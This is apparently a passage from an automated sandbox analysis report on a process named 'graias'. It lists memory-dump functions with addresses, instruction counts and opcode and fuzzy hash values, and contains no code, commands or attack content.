                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44293d46ebf1534c3da7fd569528766cb0aac4719277ff96e84ad539609fe75f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B3119347106008FEB94EB29C884F6A73E6FF88715F1584A9E456DB7A1DE30E841DB51
                                                                                                                                                                                                                                            Function 06D04DC8 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f6cf69f59277c425f98c1fc3274cecfbaa7171236536df7b2f2d2d395a06245f
                                                                                                                                                                                                                                            • Instruction ID: dacfe1f6580e01fabd089569012811191344dfd825e09ba293b0f10189135182
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6cf69f59277c425f98c1fc3274cecfbaa7171236536df7b2f2d2d395a06245f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E318938740610CFCB69EB38D458A2E7BE2EF896117444569E10ACB3E1DF389D12CB91
                                                                                                                                                                                                                                            Function 06D0B349 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ddbabfcc4163d858daa8fbd6aa6594c98233e388241450d5566741669afa25c8
                                                                                                                                                                                                                                            • Instruction ID: 91fc35741aaf0155e84dd8de4817d35b9b3c9250063e970a56a559f15e85ee68
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddbabfcc4163d858daa8fbd6aa6594c98233e388241450d5566741669afa25c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01314A75B002149FDB54DF68C884E6E7BB6FF48720F2042AAE5259B2B1C771DD41CB90
                                                                                                                                                                                                                                            Function 06D045EC Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 02824529776b742e7746bc631b9e81d36cc46ff2f79ebe370901bb9b53e5246a
                                                                                                                                                                                                                                            • Instruction ID: 97ee45db32cf1c90f2edef9f1ae6140ac1e3a83009975c3cc155a52548e160f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02824529776b742e7746bc631b9e81d36cc46ff2f79ebe370901bb9b53e5246a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38312839B09380CFD716EB2998509AA7FF29F8621078D40EAD545CF2A3EA34CC45C791
                                                                                                                                                                                                                                            Function 06D09E1C Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8cfe579eabb7d37858c2e7f14961c8385289fc57794ea9f33ccb471db3d71dcc
                                                                                                                                                                                                                                            • Instruction ID: 98b244d0724cdc711746279ccd41dbabcef8ad49a318de3e8c16a84ecd5a1d19
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cfe579eabb7d37858c2e7f14961c8385289fc57794ea9f33ccb471db3d71dcc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3441F475E00219CFDB44DFA8D884BADB7B1FF48310F2085A6D555AB2A1DB34A941CBA0
                                                                                                                                                                                                                                            Function 06D03211 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f0eb7b3f603d308815ba53d735833a1d15ca45837cdf630d5fdb1b54fcf362fd
                                                                                                                                                                                                                                            • Instruction ID: 258d3791d35bce5f1c615e60a76b5df709b43cd6d7a23a0016d7a40bdc104db0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0eb7b3f603d308815ba53d735833a1d15ca45837cdf630d5fdb1b54fcf362fd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31315E35B016008FD755DF68D498999BBF1EF8D320B1A84AAD455AB3A2CB30EC45CF61
                                                                                                                                                                                                                                            Function 06D0B358 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 13ba8cb92aa49ad000cc47b3b05ab5e4892e16ccbc4460f2fda7c869b1cbf6c7
                                                                                                                                                                                                                                            • Instruction ID: 8f47f6c9bec86a84e9750934944da7af87948458bcaa42f5fa832b45b7ab7510
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13ba8cb92aa49ad000cc47b3b05ab5e4892e16ccbc4460f2fda7c869b1cbf6c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03315A75B002149FDB54DF68C884A6DBBB6FF88720F2042AAE5258B2F1CB71DD01CB90
                                                                                                                                                                                                                                            Function 06D08941 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5e0be8f0f620bb251dfd1b614f25298375b98720e5529449e05c9177e647f436
                                                                                                                                                                                                                                            • Instruction ID: 4d4855063f5e4f7c8be7c85581c771ba4e446bdb463d2bdde423456472a98192
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e0be8f0f620bb251dfd1b614f25298375b98720e5529449e05c9177e647f436
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01313A317106008FEB94DB29C884FAA73E6FF88715F1584A9E44ACB3A1DE30EC42DB50
                                                                                                                                                                                                                                            Function 06D04DD8 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0220b1d2a0fd47da42b2b2386b5e6bcc27ef8a5df11b87cdc2410792fc0fc2c2
                                                                                                                                                                                                                                            • Instruction ID: 078b47c2e9ed6354763bb71c74f33dff3848cbba21c4e0d9748c455f39040f78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0220b1d2a0fd47da42b2b2386b5e6bcc27ef8a5df11b87cdc2410792fc0fc2c2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 353158387406108FCB59AB39D458A2E7BE2AF986117404569E10ACB3E1DF389D12CB91
                                                                                                                                                                                                                                            Function 06D04718 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 73415bb95ac24775bf60b2fefb5f0e38b3b441b4f5efffd439e3ce8aaabecabd
                                                                                                                                                                                                                                            • Instruction ID: ff3ca516c6e21f59cc70d8a2a4a4fa6403512e449cbd51eda6d799cd16f3b434
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73415bb95ac24775bf60b2fefb5f0e38b3b441b4f5efffd439e3ce8aaabecabd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02316D38F40600CFDB95AB2AD448A2E7BE6BFC96113444569E606CB7E0DF34EC11CB92
                                                                                                                                                                                                                                            Function 06D04707 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ddf11db61ece75257187ddab0f7324dcc82c791ff15358fc1d202bfe04172b63
                                                                                                                                                                                                                                            • Instruction ID: 210119bc5bfd9edb9c36d5f7ed0410caf553b8ae015ae7130db9cfb474fcee36
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddf11db61ece75257187ddab0f7324dcc82c791ff15358fc1d202bfe04172b63
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52318938B40600CFDB55AB29D448E2D7BE6BFCA6113494569E906CB7E1DF34EC11CB82
                                                                                                                                                                                                                                            Function 06D08E85 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 92111172e96fa13b9ff988328f44d237ed7737d626aed2ff5fe274e38b17bb08
                                                                                                                                                                                                                                            • Instruction ID: 1da405bca5db736684e52425b00c1e447c25d9cb805472e4e29f879cde9b9b61
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92111172e96fa13b9ff988328f44d237ed7737d626aed2ff5fe274e38b17bb08
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2631FC75A00204CFDB94DF64D584AADBBF2EF88325F1450A9D905AB3A0DB31ED41DF60
                                                                                                                                                                                                                                            Function 06D0C0D8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8d671ac7f9c919537195fe8405d4606b821cd77b6378bf06b69b50aad0e0ef17
                                                                                                                                                                                                                                            • Instruction ID: d411046711bcb997afb4a1319d66ce80ea6a2a4e986f047e7e9fc4c92a5029bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d671ac7f9c919537195fe8405d4606b821cd77b6378bf06b69b50aad0e0ef17
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A421E431604744CFE764DF34C89066A77F5FF85205B104A7DE4A24B2D1DB35D456CB61
                                                                                                                                                                                                                                            Function 06D09CD6 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: eb7f59b9f9268533e33e632ef2a79957808a42ee5d61cbcbfcb03dde63346633
                                                                                                                                                                                                                                            • Instruction ID: a5931f002d5a32577535dc4a9db9ffb57ef43dbc32e6a97d369fee562f819e29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb7f59b9f9268533e33e632ef2a79957808a42ee5d61cbcbfcb03dde63346633
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF21C131B04601DFE7699B29C890F7AB7A5FF85714F049679E1499B2A1CE34E805C7E0
                                                                                                                                                                                                                                            Function 00B9D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1706529896.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_b9d000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d756e51530f35b34df5d95f379f6178b9dfb912fe721d455139573ecc33ead62
                                                                                                                                                                                                                                            • Instruction ID: 404e221ed8fb5cf8e0fff0462d529299655c029bf3a796da5ee93645c9a0be00
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d756e51530f35b34df5d95f379f6178b9dfb912fe721d455139573ecc33ead62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D2103B1504204DFDF05DF15D9C0B26BFA5FB98324F24C5B9E90A0B356C33AE856DAA2
                                                                                                                                                                                                                                            Function 06D011FC Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6644eec0b7c4cb79ab420fcefddaaa6b4a0eead6ed124765c58ca6d8359b701d
                                                                                                                                                                                                                                            • Instruction ID: 94a0a59e0a2363c21e2dc865c691ff5d1c7f5148e0e6ace164fa9b6f89f2f404
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6644eec0b7c4cb79ab420fcefddaaa6b4a0eead6ed124765c58ca6d8359b701d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5310C706106008FDB94DB28C488BA677E6FF85711F5585A9E15ECB3A1CF71A886DB40
                                                                                                                                                                                                                                            Function 06D08A70 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b6c155e4cdc2d2619d2f9b760ef855ea400be16fa3ba467ad6ba6581cb90236e
                                                                                                                                                                                                                                            • Instruction ID: 7128e9cb09907ff55e97cebf4a0fefebe7ab86f957800a38372fb2792dca3728
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6c155e4cdc2d2619d2f9b760ef855ea400be16fa3ba467ad6ba6581cb90236e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17312F716106008FD764DB28D848BA677E2FF88311F5584A9E14ECB3A1DF71AC86DB40
                                                                                                                                                                                                                                            Function 00BAD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1709815713.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_bad000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9414b05ed7136558acb6b2fa96a7cea4fecbfe6ecad1fe3fac7ed8c1ae0f3730
                                                                                                                                                                                                                                            • Instruction ID: 9e924cb188eda1bc184712bf07e7b61d356cc1683b41e9c5daaad7bf9d298121
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9414b05ed7136558acb6b2fa96a7cea4fecbfe6ecad1fe3fac7ed8c1ae0f3730
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 372137B1508200DFCB24DF14D9D0B26BBA5FB85314F20C5ADD80B4B656C336D807CB61
                                                                                                                                                                                                                                            Function 00BAD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1709815713.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_bad000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e7e66e167a0dcb91b3426533a2929d3696db9b4deea5b579435b0d8c6719a138
                                                                                                                                                                                                                                            • Instruction ID: e7b35edd05b22598619a318a138b975deaf5c8089a8548a4881f440aebedcdfa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7e66e167a0dcb91b3426533a2929d3696db9b4deea5b579435b0d8c6719a138
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 742104B5608300EFDB05DF14D9C0B26BBA5FB85314F24C9ADE90A4B692C73AD846CA61
                                                                                                                                                                                                                                            Function 06D09D48 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 97f29116d3c7e731330854cac62a5fa39fc3b555d7da41c2c900543ea268825f
                                                                                                                                                                                                                                            • Instruction ID: 25bb2914a71267a6bcdecee7b669d17651a552ea35330ed55a23da32c4691d99
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f29116d3c7e731330854cac62a5fa39fc3b555d7da41c2c900543ea268825f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A21C031B005019FE7689B29C890F6AB3A6FF84700F009639E1089B3A0CE74EC05CBE0
                                                                                                                                                                                                                                            Function 06D0DA60 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cd8bf3d38abda68a5e71e78d03f44f2b92a78ef2971f5a51e9b50f8f3f2d5cc1
                                                                                                                                                                                                                                            • Instruction ID: 2899ea82f2ab6e65432eb609d5ea6b88feafb61cf3eb7b7a8fd178cea24adcc1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd8bf3d38abda68a5e71e78d03f44f2b92a78ef2971f5a51e9b50f8f3f2d5cc1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B116D306017108FDB7A6B78881061A77A7EF86635730477EC0798B2E1CA35D842CB50
                                                                                                                                                                                                                                            Function 06D0AE98 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 348deed0abd2fd5df052f034fb6d8d8606224df85e5dec05a16a9216d55e6145
                                                                                                                                                                                                                                            • Instruction ID: 327ee3c9f78c27dbd9b5a6883fc6aacbf0b89b31a9da3307ea3bc0ea352858af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 348deed0abd2fd5df052f034fb6d8d8606224df85e5dec05a16a9216d55e6145
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E1182717097918FD711DB18D840956FBE9AF8A32031DC9AAF4AAC7682D734EC46CB90
                                                                                                                                                                                                                                            Function 06D08898 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 040ef2dfd0f6647cd3158d30fa310efd4a590c69d7474cf056525f4f031f3aba
                                                                                                                                                                                                                                            • Instruction ID: 6152245e0742b7ad1d4b867e56502309978ce16e3261cebc54e6183ce42a81a8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 040ef2dfd0f6647cd3158d30fa310efd4a590c69d7474cf056525f4f031f3aba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9119D35B006048FDB64AF39E88091AB7F6EF9621175405BEE046DB3B0EA31DC85CB61
                                                                                                                                                                                                                                            Function 00BAD006 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1709815713.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_bad000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a6b96597eba1cf4518148d2ef0f9eafe7b269658226d48dacbadc0fda2e4fede
                                                                                                                                                                                                                                            • Instruction ID: cea4dfd5490bb291d9790085682e53337fc2b557824749e1997e0506e1af71cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6b96597eba1cf4518148d2ef0f9eafe7b269658226d48dacbadc0fda2e4fede
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B221A4755093808FCB12CF20D590B15BFB1EB46314F28C5DAD8498B697C33AD80ACB62
                                                                                                                                                                                                                                            Function 06D0CE10 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3f8d75b7af1965803dac889600d260d829bb97ba03c976f6122265bf67ac84bc
                                                                                                                                                                                                                                            • Instruction ID: edc298602161c28a64888d3ae876ee9faaaf52f4bda42efb59bda6b21e01e7f1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f8d75b7af1965803dac889600d260d829bb97ba03c976f6122265bf67ac84bc
